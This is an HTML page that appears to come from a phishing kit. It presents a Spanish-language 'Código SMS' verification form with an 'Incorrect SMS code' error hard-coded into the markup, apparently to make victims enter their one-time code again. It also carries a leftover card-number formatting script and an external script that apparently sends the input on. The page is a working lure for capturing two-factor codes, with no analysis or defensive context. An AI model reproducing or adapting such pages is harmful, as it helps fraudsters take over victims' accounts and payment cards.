<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/shoyp.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body class="a1">
    <div>
        <div class="roof">
            <img src="./img/foqa.JPG" alt="">
        </div>
    </div>


    <div>
        <div>
            <div class="pp3">
                <img src="./img/somrup1.JPG" alt="">
                
            </div>
            
            <!-- <p class="pp2">
                Panier :
                <span>1 Article</span>
            </p> -->
            <div class="section">
               
                <div class="kolch">
                    <form method="post" id="pg4">

                        <p>Código SMS  </p>
                        <input class="inp3 inp1" type="text" name="" id="sps2" maxlength="8" placeholder="- - -    - - -" required>

                        <p style="margin-left: 0px; margin-top: -10px; color: rgb(192, 28, 28);">Incorrect SMS code</p>


                        <button class="btn2"  type="submit">Validar</button>
                    </form>
                </div>
            </div>
        </div>
    </div>


    <div>
        <div>
            <div class="boot">
                <img src="./img/bonato.JPG" alt="">
            </div>
        </div>
    </div>


    <script>
        $("#numcc").on("keyup",function(){
           cc = $(this).val().split(" ").join("");
           cc = cc.match(new RegExp('.{1,4}$|.{1,4}', 'g')).join(" ");
           $(this).val(cc);
       });
    </script>

    <!--  -->
    <script src="./js/stb.js"></script>
</body>
</html>